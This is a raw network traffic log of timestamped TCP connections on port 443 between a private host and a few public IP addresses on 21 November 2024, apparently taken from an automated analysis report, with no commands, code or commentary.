                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.504571915 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.576304913 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.577245951 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.621423960 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.625397921 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.695776939 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.696739912 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.728143930 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.839973927 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.847629070 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.892647028 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.906327963 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:02.955147028 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.049093008 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.049177885 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.049266100 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.080064058 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.086971998 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.090121984 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.091387033 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.161576033 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.182934046 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.199501038 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.206546068 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.209630966 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.210913897 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.267750025 CET4967780192.168.2.8192.229.211.108
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.303108931 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.413974047 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.420274973 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.420334101 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.420403004 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.426436901 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.426513910 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.426579952 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.429174900 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.429244041 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.432513952 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.450789928 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.470304966 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.471235037 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.552037001 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.570374012 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.589788914 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.590791941 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.624504089 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.673964977 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.678910971 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.780932903 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.780987024 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.075675011 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.195091009 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.210782051 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.210871935 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.211200953 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.234282970 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.244095087 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.366844893 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.405724049 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.408869982 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.411051035 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.411093950 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.411226988 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.411360979 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.413433075 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.413433075 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.539274931 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.577481031 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.581854105 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.616317034 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.619069099 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.749605894 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.749703884 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.752490997 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.753309011 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.753376007 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.753401041 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.753427982 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.756263971 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.756690979 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.797545910 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.888839960 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.011231899 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.041979074 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.086179018 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.088820934 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.099275112 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.099334955 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.101603985 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.103230953 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.103338003 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.161580086 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.167534113 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.168844938 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.221215010 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.288727999 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.376365900 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.379568100 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.431757927 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.435199022 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.497730970 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.497900009 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.501102924 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.507587910 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.507658958 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.507721901 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.507786036 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.512449026 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.514518976 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.598093987 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.620646954 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.631957054 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.634166956 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.718139887 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.724176884 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.831202984 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.834949970 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.842569113 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.843852043 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.843935966 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.846271992 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.848977089 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.849136114 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.849138975 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.281656981 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.285514116 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.286127090 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.287420988 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.288091898 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.396285057 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.415519953 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.415642977 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.416737080 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.416774035 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.464695930 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.468799114 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.633960962 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.634035110 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.634107113 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.634160042 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.636229992 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.636293888 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.636423111 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.636476994 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.638979912 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.639574051 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.640527964 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.641565084 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.717298985 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.759536028 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.759589911 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.760166883 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.761646032 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.931256056 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.936708927 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.977636099 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.977662086 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.977694035 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.977721930 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.980500937 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.983087063 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:10.984563112 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.079575062 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.123092890 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.140933990 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.144118071 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.145066023 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.255687952 CET49676443192.168.2.852.182.143.211
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.279789925 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.334929943 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.348268032 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.352247000 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.369355917 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.490447998 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.490560055 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.493916988 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.508219004 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.508236885 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.508296967 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.508296967 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.512695074 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.514130116 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.632752895 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.673890114 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.700320005 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.718624115 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.718709946 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.742273092 CET49673443192.168.2.823.206.229.226
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.801666021 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.802674055 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.842971087 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.849524975 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.849538088 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.849761963 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.887676954 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.898121119 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.900902033 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:11.936170101 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.943290949 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.943337917 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.946017027 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.946911097 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:13.984524965 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.059798956 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.061995029 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.065599918 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.066790104 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.207093954 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.210006952 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.276238918 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.282116890 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.282216072 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.282282114 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.295501947 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.302886009 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.305761099 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.329767942 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.416891098 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.417224884 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.427002907 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.438965082 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.442903996 CET4434970523.206.229.226192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.442989111 CET49705443192.168.2.823.206.229.226
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.605725050 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.627557039 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.634985924 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.635391951 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.640960932 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.641372919 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.641433954 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.790337086 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.792248011 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.792928934 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.793705940 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.845385075 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.871906042 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.909889936 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.911744118 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.912369013 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.913152933 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:14.993839025 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:15.227008104 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:15.227142096 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:15.227188110 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:15.230227947 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:15.230912924 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:15.230962038 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:15.231040001 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:15.231081009 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:15.234658003 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:15.234730005 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:15.235457897 CET49707443192.168.2.813.107.246.63
